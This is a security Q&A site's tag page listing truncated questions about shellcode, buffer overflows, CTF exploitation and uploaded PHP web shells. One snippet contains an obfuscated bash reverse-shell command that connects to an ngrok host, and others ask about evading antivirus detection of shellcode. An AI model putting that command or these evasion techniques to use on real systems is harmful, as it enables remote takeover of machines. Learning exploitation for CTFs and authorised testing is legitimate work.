Questions tagged [shellcode]
In computer security, a shellcode is a small piece of code used as the payload in the exploitation of a software vulnerability. It is called "shellcode" because it typically starts a command shell from which the attacker can control the compromised machine, but any piece of code that performs a similar task can be called shellcode.
243
questions
0
votes
0
answers
65
views
Why does my uploaded shell as .php gets downloaded rather than executed when I hit the URL?
I have uploaded a php shell using a file upload vulnerability. But when I hit the .php url after uploading it. It gets downloaded rather than executed. Why is that. And how can I execute my shell code?...
1
vote
2
answers
76
views
PHP embedded within PNG is not executing rather randering in IIS but executes in Apache
I am pentesting a site with all permissions. I have been able to upload a PHP shell embedded within a png image. I have also been able to change the extension of the file like
something.php. So my ...
1
vote
0
answers
68
views
How to get Avast to stop quarantining my program?
I need to use a .NET shellcode inside a c++ unmanaged process. Let me be clear the shellcode is not malicious by any means, I just need it to load .NET code in an unmanaged process.
Antivirus won't ...
1
vote
0
answers
37
views
How can I jump to an address after executing a donut shellcode?
I'm looking to execute a shellcode by packaging it inside an executable.
I generate an executable (open the calculator)
I output a shellcode from the executable with donut.
donut.exe -i opencalc.exe ...
0
votes
0
answers
56
views
Buffer Overflow shell
I'm trying to exploit the code posted by ir0nstone at this link https://ir0nstone.gitbook.io/notes/types/stack/shellcode.
I followed any of the steps listed in the tutorial, ASLR is not enabled on my ...
0
votes
1
answer
69
views
Reverse Shell payload does not work
$(/bin/prin[t]f 'ba\x73h -c \x27ba\x73h -i \x3e\x26 /d\x65v/t\x63p/2.t\x63p.eu.ngrok.io/xxxxx 0\x3e\x261\x27')
-i: -c: line 1: unexpected EOF while looking for matching `''
I was trying to get a ...
0
votes
0
answers
110
views
push /bin/sh to get a shell
I usually use a different method to push /bin/sh in rdi to get a shell, but I wanted to try this one :
Put in case that I can control the RIP and there are no limitations or filters. So I can execute ...
1
vote
0
answers
94
views
How can I exploit the following code using string format vulnerabilities, Global offset table & GDB? [closed]
The following code should be exploited and I need to exploit it in such a way that it runs my command (l33t) and there should be shellcode and exploit included, so that it runs my command. I believe I ...
1
vote
0
answers
113
views
How to properly pack address into bytes to overwrite EIP register
I'm learning how to exploit a tiny web server based on a well written post here: https://blog.coffinsec.com/2017/11/10/tiny-web-server-buffer-overflow-discovery-and-poc.html
I am very close to ...
0
votes
0
answers
239
views
Encoding shellcode to hide in filename / directory
Working on a CTF challenge and the coordinators hint suggests that one of the vectors to inject shellcode is via pathing. Looking at debugging prints does show the cwd and filename are passed onto the ...
0
votes
0
answers
241
views
Decoding shellcode gets detected in memory on runtime
I am developing a custom shellcode encoder in C++. It takes shellcode as a command line argument and generates encoded shellcode (unsigned char array) and the instructions to decode it (C/C++ code). I ...
0
votes
1
answer
239
views
Exporting shellcode to environment variable doesn't work as expected
(This is a question regarding a challenge in a wargame on overthewire.org called Narnia similar to Shellcode does not execute as the owner )
When exporting shellcode to EGG environment variable
export ...
0
votes
1
answer
504
views
Unable to execute shellcode on x86_64 architecture
I currently got interested in binary exploitation (even though I do not know if today is still useful).
I started studying shellcode and buffer overflow (stack-buffer overflow, specifically). I know ...
1
vote
1
answer
440
views
Buffer overflow stops executing shellcode in the middle of it
I am trying to execute a simple shellcode by using a buffer overflow. The shell code starts executing but stops in the middle (even though it is fully copied to memory).
This is the vulnerable C code:...
0
votes
1
answer
180
views
Info integer overflow vulnerability
I've found this interesting question Is this integer overflow vulnerability exploitable?.
How can I practically find the next instruction (in gdb) so that I can overwrite the return address and ...